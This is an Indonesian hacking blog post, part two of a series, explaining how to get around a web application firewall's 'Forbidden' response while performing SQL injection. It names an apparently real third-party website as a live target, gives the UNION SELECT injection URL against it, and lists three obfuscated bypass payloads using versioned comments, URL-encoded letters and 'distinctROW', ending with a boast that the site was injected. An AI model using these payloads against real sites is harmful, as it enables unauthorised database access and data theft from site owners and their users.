SQL Injection ByPass Forbidden #2

 


Hai! Gw SwipeMoon


Kali ini gw bakal memberitahu cara memByPass Forbidden Pada SQL INJECTION saat melakukan union select, langsung ae :b .


Live Target :

ttp://sakinaidaman.com/berita.php?sa=berita&id=17


Di part 1 gw udah ngasih tau cara melakukan order by . Nah di artikel ini gw langsung skip ke union select aja.

Ini union select nya sampai angkat tujuh ya contoh : http://sakinaidaman.com/berita.php?sa=berita&id=17'+UNION+SELECT+1,2,3,4,5,6,7--+-


Nah kalau kita menggunakan +UNION+SELECT+ yang biasa maka web nya akan forbidden. Bagaimana cara mengatasi nya? Cukup mengganti +UNION+SELECT+ menjadi +AND+0+/*!50000UniON+SeLeCt*/+


Masih Forbidden kita coba pakai UNION SELECT yang ini +AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+


Kalo masih Forbidden kalian coba menggunakan UNION SELECT yang ini +And/**/.0union/*%26*/distinctROW+select+


Web nya berhasil di bypass :D

Nah disitu angka togelnya ada 2,4,3 gw bakal masukin dios gw di angka 2 dan 3


Alhasil Forbidden nya ter ByPass dan Website pun ter inject :b


Sekian aja artikel dari gw


Best Regards,

SwipeMoon

ForceCyberTeam

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel